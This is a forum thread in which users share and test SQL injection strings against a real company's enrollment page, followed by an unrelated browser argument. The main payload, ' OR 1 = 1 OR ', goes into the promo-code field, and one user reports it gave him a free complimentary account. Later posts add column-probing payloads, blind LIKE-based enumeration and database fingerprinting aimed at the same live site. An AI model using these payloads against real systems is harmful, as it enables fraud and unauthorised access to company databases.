No, this isn't a post about Lifelock's CEO (the one who has advertisements with his SSN in them) having his identity stolen.

Go to the LifeLock enrollment site: https://secure.lifelock.com/enrollmentform.aspx

For the promotion code, use

' OR 1 = 1 OR '

(with quotes).

Hilarity ensues. 

Wow, you mean I get a completely worthless product for FREE??

Also, nice job with the link there.  I enjoy having to copy-and-paste text like this is some copy-and-paste sweatshop.  Jerk. 

Colin McGuigan:

Hilarity ensues.

AbbydonKrafts:

I wouldn't exactly call that "hilarity", but it is a WTF. The thing is, who's gonna go all the way with this and see if someone manually reviews it at the end?

I don't think that a manual review could spot this at all. The site seems to be selecting all existing discounts that match the promo code, then using the cheapest one. Adding the sql snipped is making the SELECT statement return all rows in this table, of which then the row with the smallest cost is selected. This happens to be a complementary account, which is obviously free.

From that point forward the actual values from the database row is used, and any review will look like the apropriate code was entered. 

How they want to protect me if they can't protect themselves!?

I also like 'Hacker Safe' banner on the main page (bottom right) :D

Nandurius:

From that point forward the actual values from the database row is used, and any review will look like the apropriate code was entered.

Dear XioPod, Thank you for enrolling with LifeLock®. You are the primary contact for the XioPod Family. You have elected the following payment option: Comp Plan, which includes a recurring payment of $ 0.00. This amount will be automatically charged to your credit card each month or year, depending on your payment option. Your Invoice Number is: [omitted] To contact us, please do not reply to this email. If you have any questions, please send a separate email to member.services@lifelock.com or give us a call at 1-877-543-3562 and select option 2. We are available 24/7. Thank you for your membership. Sincerely, LifeLock Member Services

morbiuswilters:

Also, nice job with the link there.  I enjoy having to copy-and-paste text like this is some copy-and-paste sweatshop.  Jerk. 

El_Heffe:

Somethings when I put a link in a post it comes out fine and sometimes it doesn't

El_Heffe:

I think there's some sort of WTF with this forum software. 

Funny, I have used IE7, FF3 (B1-5,RC1) and Safari on this forum and I have never seen the behavior you suggest.

XioPod:

LOL!! it worked, i just signed up and got an e-mail from them:

This amount will be automatically charged to your credit card each month or year, depending on your payment option.

 You didn't use your real card details did you? You really should bill free stuff to a test (Visa) card number like 4111 1111 1111 1111 ...

MasterPlanSoftware:

El_Heffe:

I think there's some sort of WTF with this forum software. 

 

Funny, I have used IE7, FF3 (B1-5,RC1) and Safari on this forum and I have never seen the behavior you suggest.

What, no Opera?

bstorer:

What, no Opera?

Nope, get a real browser.

' or [SomeColumnName] <> 1 or '

Error if column doesn't exist, success if column does exist. If we figure out table names, we can union to select more data.

[Name] is a valid column.

MasterPlanSoftware:

bstorer:

What, no Opera?

 

Nope, get a real browser.

MasterPlanSoftware:

I have used IE7

' OR Name like 'a%'-- or '

Produces a comp account.

' OR Name like 'b%'-- or '

Does not.

joe.edwards:

' or [SomeColumnName] <> 1 or '

Error if column doesn't exist, success if column does exist. If we figure out table names, we can union to select more data.

[Name] is a valid column.

Kind of pointless though, cant see any way to get information out unless you can somehow insert a dynamic select and override the promotion description ("You save $10.00!") or whatever. Tricky without knowing the schema exactly.

VisualD:

MasterPlanSoftware:

I have used IE7

Wtf?

Do you not understand what I said? Do you not know what IE7 is?

 Step 1 is to figure out what db type it is... It could be oracle ' OR GREATEST(1,2) = 1 OR ' works.

MasterPlanSoftware:

Do you not understand what I said? Do you not know what IE7 is?

Not a real browser? As in, actually far enough from the standards that its not funny (yes I know its better than 6, doesn't exactly say much). To claim Opera is not a real browser when your implying IE7 is, is to me, somewhat laughable. As a web developer, Opera, FF and Safari display my valid xhtml / css / javascript almost identically, whereas IE(Whatever, maybe not 8) is invariably well out of kilter. A "Proper" browser to me would suggest one that actually follows international standards, like actually implementing that little known "css" thing properly, maybe even with a box model that actually makes sense.

Thought it was pretty obvious really. I shall endeavor to be more verbose in future to aid in your comprehension.

VisualD:

As a web developer

Well there goes that credibility.... 

If you think IE7 is the problem, then you don't understand the issue. Don't talk to me about standards.

VisualD:

Not a real browser? As in, actually far enough from the standards that its not funny (yes I know its better than 6, doesn't exactly say much). To claim Opera is not a real browser when your implying IE7 is, is to me, somewhat laughable. As a web developer, Opera, FF and Safari display my valid xhtml / css / javascript almost identically, whereas IE(Whatever, maybe not 8) is invariably well out of kilter. A "Proper" browser to me would suggest one that actually follows international standards, like actually implementing that little known "css" thing properly, maybe even with a box model that actually makes sense.

Thought it was pretty obvious really. I shall endeavor to be more verbose in future to aid in your comprehension.

If you are writing pages in XHTML you are almost certainly serving up broken HTML.  Way to follow the standards there.  Also, all of the browsers have flaws.  IE has the largest install base so it is a defacto standard and if I had to choose only one browser to support, it would definitely be IE.  People who endlessly appeal to "the standards" without realizing most standards are hopelessly flawed and no software follows them properly annoy the hell out of me.  Seriously, get over it and write the goddamn code.  This is what we are paid for.  If it was so easy any idiot could do it then most of us wouldn't have jobs.  Also, Opera sucks and needs to die.  It's bad enough we have 3 mediocre browsers (IE, FF and Safari) but there is no reason for Opera to exist. 

morbiuswilters:

endlessly appeal to "the standards" without realizing most standards are hopelessly flawed

And I am sure that VisualD can sit down and read through the standards and write a perfect working browser too...

What these /. rejects need to realize is IE sets the standard. Whoever has the most market share? Standard. Plain and simple. Cry about it all you want, but that is the way it works.

MasterPlanSoftware:

Whoever has the most market share? Standard.

In that case, IE needs to support my <blink> tags, because Netscape Navigator used to be the standard!